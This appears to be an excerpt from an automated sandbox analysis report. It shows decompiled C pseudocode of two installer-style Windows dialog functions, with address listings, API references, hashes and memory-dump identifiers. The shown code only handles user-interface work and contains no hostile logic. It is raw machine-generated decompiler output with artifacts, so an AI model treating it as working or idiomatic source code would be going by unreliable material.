                                                • Associated: 00000000.00000002.344773130.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.344794583.0000000010002000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x6ab3d5
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                0x00404ccf
                                                0x00404cd7
                                                0x00404cdf
                                                0x00404ce5
                                                0x00404cfd
                                                0x00404d00
                                                0x00404d01
                                                0x00404f2e
                                                0x00404f35
                                                0x00404f49
                                                0x00404f37
                                                0x00404f39
                                                0x00404f3c
                                                0x00404f3d
                                                0x00404f44
                                                0x00404f44
                                                0x00404f55
                                                0x00404f63
                                                0x00404f66
                                                0x00404f7c
                                                0x00404ff1
                                                0x00404ff4
                                                0x00404ff6
                                                0x00405000
                                                0x0040500e
                                                0x0040500e
                                                0x00405010
                                                0x0040501a
                                                0x00405020
                                                0x00405023
                                                0x00405026
                                                0x00405041
                                                0x00405028
                                                0x00405032
                                                0x00405032
                                                0x00405026
                                                0x0040501a
                                                0x00000000
                                                0x00404ff4
                                                0x00404f81
                                                0x00404f8c
                                                0x00404f91
                                                0x00404f98
                                                0x00404f9d
                                                0x00404fa1
                                                0x00404fac
                                                0x00404fac
                                                0x00404fb0
                                                0x00404fb4
                                                0x00404fb8
                                                0x00404fcb
                                                0x00404fba
                                                0x00404fba
                                                0x00404fc1
                                                0x00404fc7
                                                0x00404fc3
                                                0x00404fc3
                                                0x00404fc3
                                                0x00404fc1
                                                0x00404fcf
                                                0x00404fd1
                                                0x00404fe4
                                                0x00404fe7
                                                0x00404fea
                                                0x00404fea
                                                0x00404fb4
                                                0x00000000
                                                0x00404fa1
                                                0x00404f83
                                                0x00404f8a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405044
                                                0x00405044
                                                0x0040504b
                                                0x004050bc
                                                0x004050c4
                                                0x004050cc
                                                0x004050cc
                                                0x004050d5
                                                0x004050d7
                                                0x004050de
                                                0x004050e1
                                                0x004050e1
                                                0x004050e7
                                                0x004050ee
                                                0x004050f1
                                                0x004050f1
                                                0x004050f7
                                                0x004050fd
                                                0x00405103
                                                0x00405103
                                                0x00405110
                                                0x00405270
                                                0x00405277
                                                0x00405294
                                                0x0040529a
                                                0x004052ac
                                                0x004052ac
                                                0x00000000
                                                0x00405116
                                                0x00405118
                                                0x0040511d
                                                0x00405122
                                                0x00405127
                                                0x00405129
                                                0x00405129
                                                0x0040512a
                                                0x0040512b
                                                0x0040512d
                                                0x0040512d
                                                0x00405135
                                                0x00405176
                                                0x00405178
                                                0x00405188
                                                0x0040518b
                                                0x00405190
                                                0x00405197
                                                0x0040519a
                                                0x0040523c
                                                0x00405244
                                                0x0040524c
                                                0x0040524c
                                                0x00405252
                                                0x0040525a
                                                0x0040526b
                                                0x0040526b
                                                0x00000000
                                                0x0040525a
                                                0x004051a0
                                                0x004051a3
                                                0x004051a9
                                                0x004051ae
                                                0x004051b0
                                                0x004051b2
                                                0x004051b8
                                                0x004051bf
                                                0x004051c4
                                                0x004051cb
                                                0x004051ce
                                                0x004051ce
                                                0x004051d5
                                                0x004051e1
                                                0x004051e5
                                                0x004051e7
                                                0x004051e7
                                                0x004051d7
                                                0x004051d9
                                                0x004051d9
                                                0x00405207
                                                0x00405213
                                                0x00405222
                                                0x00405222
                                                0x00405224
                                                0x00405227
                                                0x00405230
                                                0x00000000
                                                0x00405137
                                                0x00405142
                                                0x00405145
                                                0x0040514a
                                                0x0040514c
                                                0x00405150
                                                0x00405160
                                                0x0040516a
                                                0x0040516c
                                                0x0040516f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405152
                                                0x00405152
                                                0x00405158
                                                0x0040515a
                                                0x0040515a
                                                0x0040515b
                                                0x0040515c
                                                0x00000000
                                                0x00405152
                                                0x00405135
                                                0x00405110
                                                0x00405053
                                                0x00000000
                                                0x00405069
                                                0x00405073
                                                0x00405078
                                                0x00000000
                                                0x00000000
                                                0x0040508a
                                                0x0040508f
                                                0x0040509b
                                                0x0040509b
                                                0x0040509d
                                                0x004050ac
                                                0x004050ae
                                                0x004050b2
                                                0x004050b5
                                                0x00000000
                                                0x004050b5
                                                0x00405053
                                                0x00404d07
                                                0x00404d0a
                                                0x00404d0d
                                                0x00404d1d
                                                0x00404d30
                                                0x00404d3b
                                                0x00404d41
                                                0x00404d4f
                                                0x00404d62
                                                0x00404d67
                                                0x00404d72
                                                0x00404d7b
                                                0x00404d91
                                                0x00404da1
                                                0x00404dad
                                                0x00404dad
                                                0x00404db2
                                                0x00404db8
                                                0x00404dba
                                                0x00404dbd
                                                0x00404dc2
                                                0x00404dc7
                                                0x00404dc9
                                                0x00404dc9
                                                0x00404de9
                                                0x00404de9
                                                0x00404deb
                                                0x00404dec
                                                0x00404df1
                                                0x00404df7
                                                0x00404dfb
                                                0x00404e00
                                                0x00404e08
                                                0x00404e0c
                                                0x00404e11
                                                0x00404e16
                                                0x00404e1e
                                                0x00404e21
                                                0x00404ef0
                                                0x00404f03
                                                0x00000000
                                                0x00404e27
                                                0x00404e2a
                                                0x00404e2d
                                                0x00404e30
                                                0x00404e30
                                                0x00404e35
                                                0x00404e3e
                                                0x00404e41
                                                0x00404e45
                                                0x00404e48
                                                0x00404e4b
                                                0x00404e54
                                                0x00404e5d
                                                0x00404e60
                                                0x00404e63
                                                0x00404e66
                                                0x00404ea4
                                                0x00404ecf
                                                0x00404ea6
                                                0x00404eb5
                                                0x00404eb5
                                                0x00404e68
                                                0x00404e6b
                                                0x00404e79
                                                0x00404e83
                                                0x00404e8b
                                                0x00404e92
                                                0x00404e9d
                                                0x00404e9d
                                                0x00404e66
                                                0x00404ed5
                                                0x00404ed6
                                                0x00404ee2
                                                0x00404ee2
                                                0x00404eee
                                                0x00404f09
                                                0x00404f0c
                                                0x00404f29
                                                0x00000000
                                                0x00404f0e
                                                0x00404f13
                                                0x00404f1c
                                                0x004052ae
                                                0x004052c0
                                                0x004052c0
                                                0x00404f0c
                                                0x00000000
                                                0x00404eee
                                                0x00404e21

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404CC8
                                                • GetDlgItem.USER32 ref: 00404CD5
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                                                • LoadImageA.USER32 ref: 00404D3B
                                                • SetWindowLongA.USER32 ref: 00404D55
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404D91
                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404D9D
                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DAD
                                                • DeleteObject.GDI32(00000110), ref: 00404DB2
                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404DDD
                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404DE9
                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E83
                                                • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EB3
                                                  • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EC7
                                                • GetWindowLongA.USER32 ref: 00404EF5
                                                • SetWindowLongA.USER32 ref: 00404F03
                                                • ShowWindow.USER32(?,00000005), ref: 00404F13
                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040500E
                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405073
                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405088
                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050AC
                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050CC
                                                • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                                                • GlobalFree.KERNEL32 ref: 004050F1
                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040516A
                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00405213
                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405222
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                                                • ShowWindow.USER32(?,00000000), ref: 0040529A
                                                • GetDlgItem.USER32 ref: 004052A5
                                                • ShowWindow.USER32(00000000), ref: 004052AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                                                • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                0x00403de1
                                                0x00403dea
                                                0x00403f2b
                                                0x00403f2f
                                                0x00403f33
                                                0x00403f35
                                                0x00403f3a
                                                0x00403f45
                                                0x00403f50
                                                0x00403f55
                                                0x00403f57
                                                0x00403f59
                                                0x00403f5c
                                                0x00403f61
                                                0x00403f6f
                                                0x00403f7c
                                                0x00403f83
                                                0x00403f83
                                                0x00403f84
                                                0x00403f84
                                                0x00403f89
                                                0x00403f8f
                                                0x00403f96
                                                0x00403f9c
                                                0x00403f9e
                                                0x00403fde
                                                0x00403fe3
                                                0x00403fe8
                                                0x00403fe8
                                                0x00403fed
                                                0x00403ff6
                                                0x00403ff8
                                                0x00403ffd
                                                0x00404003
                                                0x00404007
                                                0x00404007
                                                0x0040400c
                                                0x00404012
                                                0x00000000
                                                0x00000000
                                                0x0040401d
                                                0x00404023
                                                0x00000000
                                                0x00000000
                                                0x0040402c
                                                0x00404034
                                                0x00404039
                                                0x0040403c
                                                0x00404042
                                                0x00404047
                                                0x0040404a
                                                0x00404050
                                                0x00404055
                                                0x00404058
                                                0x0040405e
                                                0x00404066
                                                0x0040406c
                                                0x00404072
                                                0x00404076
                                                0x0040407d
                                                0x0040407d
                                                0x0040407d
                                                0x00404087
                                                0x00404099
                                                0x004040a5
                                                0x004040aa
                                                0x004040b4
                                                0x004040ba
                                                0x004040bc
                                                0x004040c1
                                                0x004040be
                                                0x004040be
                                                0x004040be
                                                0x004040d1
                                                0x004040e9
                                                0x004040eb
                                                0x004040f1
                                                0x00404106
                                                0x004040f3
                                                0x004040fc
                                                0x004040fe
                                                0x004040fe
                                                0x0040410c
                                                0x0040411d
                                                0x0040412e
                                                0x00404135
                                                0x0040413f
